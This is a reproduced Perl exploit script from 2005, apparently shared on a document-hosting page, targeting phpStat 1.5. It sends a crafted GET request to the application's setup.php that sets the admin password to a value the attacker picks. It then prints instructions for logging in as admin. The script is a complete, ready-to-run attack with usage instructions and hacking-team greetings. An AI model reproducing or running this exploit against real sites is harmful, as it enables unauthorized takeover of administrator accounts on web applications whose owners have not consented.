Your Federal Quarterly Tax Payments are due April 15th Get Help Now >>

phpStat 1.5 setup.php Authentication Bypass Exploit perl by h3m4n

VIEWS: 39 PAGES: 2

									                              phpStat 1.5 setup.php Authentication Bypass Exploit perl                   Page 1/2
  1    #!/usr/bin/perl
  2    #####################################################################
  3    #T r a p − S e t   U n d e r g r o u n d   H a c k i n g   T e a m
  4    #####################################################################
  5    # EXPLOIT FOR − PHPStat Setup.PHP Authentication Bypass Vulnerability
  6    #
  7    #Exploit By : A l p h a _ P r o g r a m m e r ( Sirus−v )
  8    #E−Mail : Alpha_Programmer@Yahoo.com
  9    #
  10   #This Xpl Change Admin’s Pass in This Portal !!
  11   #Discovered by: SoulBlack
  12   #
  13   #Vulnerable Version : phpStat 1.5
  14   #
  15   #####################################################################
  16   # Gr33tz To ==>   mh_p0rtal , Oil_karchack , Str0ke & AlphaST.Com
  17   #
  18   # So Iranian Hacking & Security Teams :
  19   #
  20   # Crouz , Shabgard , Simorgh−ev ,IHS , Emperor & GrayHatz.NeT
  21   #####################################################################
  22
  23
  24   use IO::Socket;
  25
  26   if (@ARGV < 3)
  27   {
  28     print "\n==========================================\n";
  29     print " \n −− Exploit By Alpha Programmer −−\n\n";
  30     print " Trap−Set UnderGrounD Hacking Team        \n\n";
  31     print "     Usage: <T4rg3t> <DIR> <Password>\n\n";
  32     print "==========================================\n\n";
  33     print "Examples:\n\n";
  34     print " phpStat.pl www.Site.com /phpstat/ 12345\n";
  35     exit();
  36   }
  37
  38   my $host = $ARGV[0];
  39   my $remote = IO::Socket::INET−>new ( Proto => "tcp", PeerAddr => $host,
  40   PeerPort => "80" );
  41
  42   unless ($remote) { die "C4nn0t C0nn3ct to $host" }
  43
  44   print "C0nn3cted\n";
  45
  46   $http = "GET $ARGV[1]setup.php?check=yes&username=admin&password=$ARGV[2] HTTP/1.0\n";
  47   $http .= "User−Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR 1.1.4322)\n";
  48   $http .= "Host: $host\n\n\n\n";
  49
  50   print "[+]Sending H3ll Packet ...\n";
  51   print $remote $http;
  52   sleep(1);
Alpha_Programmer                                                                                         05/30/2005
                             phpStat 1.5 setup.php Authentication Bypass Exploit perl   Page 2/2
  53   print "[+]Wait For Authentication Bypass ...\n";
  54   sleep(100);
  55   while (<$remote>)
  56   {
  57   }
  58   print "[+]OK ! Now Goto $host$ARGV[1]setup.php And L0gin Whith:\n\n";
  59   print "[+]User: admin\n";
  60   print "[+]Pass: $ARGV[2]";
  61
  62   # milw0rm.com [2005−05−30]




Alpha_Programmer                                                                        05/30/2005

								
To top